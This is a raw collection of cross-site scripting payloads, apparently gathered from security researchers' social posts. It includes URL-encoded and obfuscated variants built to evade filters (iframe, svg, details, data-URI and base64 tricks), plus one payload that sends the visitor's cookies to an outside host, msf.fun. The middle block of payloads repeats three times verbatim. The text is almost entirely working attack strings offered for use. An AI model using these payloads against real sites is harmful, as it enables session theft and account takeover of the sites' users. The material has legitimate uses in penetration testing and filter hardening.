%3Ciframe%2Fonload%3D%27this%5B%22src%22%5D%3D%22javas%26Tab%3Bcript%3Aal%22%2B%22ert%60%60%22%27%3B%3E%0D%0A%3Ciframe%2Fonload%3D%22var+b+%3D+%27document.domain%29%27%3B+var+a+%3D+%27JaV%27+%2B+%27ascRipt%3Aal%27+%2B+%27ert%28%27+%2B+b%3B+this%5B%27src%27%5D%3Da%22%3E%0D%0A%3Caudio+autoplay+onloadstart%3Dthis.src%3D%27hxxps%3A%2F%2Fmsf.fun%2F%3Fc%3D%27%2Bdocument%5B%22cook%22%2B%22ie%22%5D%27+src%3Dx%3E%0D%0A%3Cimg%2Fsrc%3Dq+onerror%3D%27new+Function%60al%5Cert%5C%601%5C%60%60%27%3E%0D%0A%3Cobject+data%3D%27data%3Atext%2Fhtml%3B%3B%3B%3B%3Bbase64%2CPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D%27%3E%3C%2Fobject%3E%0D%0A%3Csvg+onload%5Cr%5Cn%3D%24.globalEval%28%22al%22%2B%22ert%28%29%22%29%3B%3E%0D%0A%5B1%5D.map%28alert%29+++or++++%28alert%29%281%29%0D%0A%3C%22%3E%3Cdetails%2Fopen%2Fontoggle%3D%22jAvAsCrIpT%26colon%3Balert%26lpar%3B%2Fxss-by-tarun%2F%26rpar%3B%22%3EXXXXX%3C%2Fa%3E%0D%0A%5B1%5D.find%28confirm%29%0D%0A%3Csvg%2Fonload%3Dself%5B%60aler%60%252b%60t%60%5D%601%60%3E%0D%0A%2522%253E%253Cobject%2520data%3Ddata%3Atext%2Fhtml%3B%3B%3B%3B%3Bbase64%2CPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D%253E%253C%2Fobject%253E%0D%0A%27-%5Bdocument.domain%5D.map%28alert%29-%27

"<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme (working)-Pinaki @0xInfection(Make sure to URL encode the payload properly) tarun"><x/onafterscriptexecute=confirm%26lpar;)// -@sratarun <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click (workin)Pinaki @0xInfection (Make sure the applications decodes the payload from encoded) <details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - @xsspayloads <svg onload\r\n=$.globalEval("al"+"ert()");> <bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click Pinaki @0xInfection <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div"> -@AldenAous <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme (working)-Pinaki @0xInfection(Make sure to URL encode the payload properly) tarun"><x/onafterscriptexecute=confirm%26lpar;)// -@sratarun <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click (workin)Pinaki @0xInfection (Make sure the applications decodes the payload from encoded) <details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - @xsspayloads <svg onload\r\n=$.globalEval("al"+"ert()");> <bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click Pinaki @0xInfection <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div"> -@AldenAous <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme (working)-Pinaki @0xInfection(Make sure to URL encode the payload properly) tarun"><x/onafterscriptexecute=confirm%26lpar;)// -@sratarun <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click (workin)Pinaki @0xInfection (Make sure the applications decodes the payload from encoded) <details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - @xsspayloads <svg onload\r\n=$.globalEval("al"+"ert()");> <bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click Pinaki @0xInfection <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div"> -@AldenAous <a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />tap

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">